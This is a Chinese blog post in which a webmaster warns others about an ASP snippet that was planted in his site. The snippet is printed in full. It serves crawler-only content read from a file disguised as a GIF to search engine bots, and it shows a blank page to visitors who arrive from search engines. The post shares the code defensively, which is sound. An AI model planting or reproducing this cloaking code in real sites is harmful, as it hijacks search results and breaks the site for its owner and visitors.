一段让asp程序在搜素引擎打不开的代码

一段让asp程序在搜素引擎打不开的代码,把我的网站害苦了,现在把它的原形呈现如下,望广大站长朋友们及早防范:

<%
function isspider()
dim i,agent,searray
agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogouspider","yahoo","Sosospider")
isspider= false
for i=0 to ubound(searray)
 if (instr(agent,searray(i))>0) then isspider=true
next
end function


function fromse()
dim urlrefer,searray,i
urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false
if urlrefer="" then fromse= false
searray=array("google","baidu","sogou","yahoo","soso")
for i=0 to ubound(searray)
 if (instr(urlrefer,searray(i))>0) then fromse=true
next
end function



if(isspider()) then
  dim myfso,fileurl,filecon,myfile
  fileurl=Server.MapPath("images/bg01.gif")
  Set myfso=Server.CreateObject("Scripting.FileSystemObject") 
  if myfso.FileExists(fileurl) then 
    Set myfile=myfso.OpenTextFile(fileurl, 1)
    filecon=myfile.readAll
    response.write(filecon)
    myfile.Close 
    Set myfile=Nothing 
    Set myfso=Nothing
    response.end
  end if
end if                                 
if (fromse()) then
  response.write("<br/>")
  response.end
else
end if
%>



  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值